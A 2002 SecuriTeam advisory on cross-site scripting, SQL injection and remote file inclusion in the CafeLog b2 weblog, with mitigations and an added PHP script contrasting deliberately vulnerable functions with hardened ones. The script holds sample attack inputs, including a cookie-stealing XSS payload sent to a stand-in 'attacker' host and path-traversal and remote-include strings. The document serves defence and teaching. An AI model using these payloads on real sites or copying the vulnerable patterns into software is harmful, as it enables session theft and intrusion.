[NEWS] Multiple Vulnerabilities in CafeLog Weblog Package

From: support@securiteam.com
Date: 08/18/02

From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 18 Aug 2002 10:53:51 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Multiple Vulnerabilities in CafeLog Weblog Package


The <http://cafelog.com/> CafeLog b2 Weblog contains multiple
vulnerabilities, the most serious of which could allow a remote attacker to
execute commands on a web server running the vulnerable package.


Vulnerable systems:
 * CafeLog b2 Weblog Tool 2.06pre4

Numerous serious vulnerabilities exist in the "b2" Weblog tool by CafeLog.
Several variables are not initialized before use or are not sanitized,
allowing several unsafe actions.

In numerous places, small pieces of data that can be set remotely through a
GPC (GET, POST or cookie) variable are echoed back to the browser without
encoding. This enables a simple cross-site scripting attack.

Further, there are several cases where the "tableposts" variable is used in
SQL queries without proper sanitization. If the server does not have the PHP
option "magic_quotes_gpc" enabled, an SQL injection attack can be mounted
against the backend database. The impact is limited, however, by the
behaviour of the PHP mysql_query() function: it executes only a single
statement per call, so stacked queries cannot be issued through it.

In addition, the variable "b2inc" is used as part of an include file path.
If this variable can be set via GPC (which register_globals permits), code
can be executed by including a remote file, or local files can be disclosed.

There are significant mitigating factors for both the SQL injection and the
command-execution vulnerabilities. The SQL injection flaw can only be
exploited if magic_quotes_gpc is disabled. It is further hampered by the PHP
mysql_query() function executing only one statement per call: stacked
queries fail, although injection within a single statement (UNION, OR, and
comment tricks) is unaffected by that limit.

Further, command execution should be limited to the rights of the PHP
user, barring exploitation of additional vulnerabilities. On UNIX, this is
typically nobody/nobody. On Windows NT/2000/XP with IIS, this may be the
IIS Internet Web Account Manager (IWAM) account, roughly equivalent to a
guest user. On other NT servers, this will be a similarly low-privileged
account.

Enabling magic_quotes_gpc eliminates the SQL injection and the local file
reading.

Disabling allow_url_fopen (misspelled "allow_fopen_url" in the original
advisory text) eliminates the command-execution vulnerability, since a
remote URL can then no longer be included. Disabling register_globals
additionally prevents b2inc and tableposts from being set from the request
at all.

However, the cross-site scripting vulnerabilities can only be eliminated by
a patch to the application.
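As an added illustration (not code from CafeLog b2 or from the advisory), the script below reconstructs the three patterns described above, namely echoing request input unencoded, building SQL from the "tableposts" variable, and deriving an include path from "b2inc", and puts a hardened form beside each. It also shows what magic_quotes_gpc actually does to a request value (addslashes()), which is why it protects a value inside a quoted string literal but not one used as a table name. The query shapes, file names and attacker inputs are assumptions made for the example; run it with `php example.php`.

```php
<?php
// Added illustration, not CafeLog b2 code. Query shapes, file names and the
// sample attacker inputs below are assumptions made for the example.

// 1. Cross-site scripting: raw echo of request data versus HTML-escaping it.
function greet_vulnerable($name) {
    return "<p>Hello $name</p>";
}
function greet_hardened($name) {
    return '<p>Hello ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '</p>';
}

// 2. SQL injection. magic_quotes_gpc applies addslashes() to every GET, POST
//    and cookie value, which only helps when the value lands inside a quoted
//    string literal. A value used as a table name needs no quote to break out,
//    so the hardened form validates it as an identifier and casts the id.
//    mysql_query() refuses a second statement after ';', so stacked queries
//    fail, but UNION/OR/comment injection inside one statement still works.
function author_query_vulnerable($tableposts, $author) {
    return "SELECT * FROM $tableposts WHERE post_author = '$author'";
}
function posts_query_vulnerable($tableposts, $id) {
    return "SELECT * FROM $tableposts WHERE ID = $id";
}
function posts_query_hardened($tableposts, $id) {
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $tableposts)) {
        throw new InvalidArgumentException('bad table name');
    }
    return sprintf('SELECT * FROM %s WHERE ID = %d', $tableposts, (int) $id);
}

// 3. File inclusion. With register_globals on, ?b2inc=http://attacker/x
//    defines $b2inc before include("$b2inc/b2functions.php") runs. The fix is
//    to set the base directory in code and confine any request-supplied file
//    name to that directory.
function include_path_hardened($base, $name) {
    if (!preg_match('/^[A-Za-z0-9_\-]+\.php$/', $name)) {
        return null;                     // rejects URLs, "..", "/", NUL bytes
    }
    $base = realpath($base);
    $candidate = ($base === false) ? false
               : realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                     // missing, or a symlink leading outside $base
    }
    return $candidate;
}

// Constructed inputs standing in for what an attacker would send.
$xss   = '<script>document.location="http://attacker/?"+document.cookie</script>';
$str   = "nobody' OR '1'='1";           // breaks out of a quoted literal
$ident = 'b2posts WHERE 1=1 -- ';       // breaks out of an identifier position

echo greet_vulnerable($xss), "\n";
echo greet_hardened($xss), "\n";

echo author_query_vulnerable('b2posts', $str), "\n";              // injectable
echo author_query_vulnerable('b2posts', addslashes($str)), "\n";  // magic_quotes_gpc: quotes escaped

echo posts_query_vulnerable($ident, 1), "\n";                     // injectable
echo posts_query_vulnerable(addslashes($ident), 1), "\n";         // unchanged: nothing to escape
try {
    posts_query_hardened($ident, 1);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo posts_query_hardened('b2posts', '1 OR 1=1'), "\n";           // id cast to 1

$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'b2-include';
@mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'b2functions.php', "<?php // placeholder\n");
var_dump(include_path_hardened($base, 'b2functions.php'));         // resolved path
var_dump(include_path_hardened($base, '../../../etc/passwd'));     // NULL
var_dump(include_path_hardened($base, 'http://attacker/shell.txt')); // NULL
```

The two addslashes() lines are the practical check for the mitigation the advisory recommends: the quoted-string case is neutralised, the identifier case is not, so on a server where tableposts reaches the query as a table name, magic_quotes_gpc alone should not be relied on.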

Vendor response:
The vendor has been notified; no official response has been received.


The information has been provided by <mailto:mattmurphy@kc.rr.com>
Matthew Murphy.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.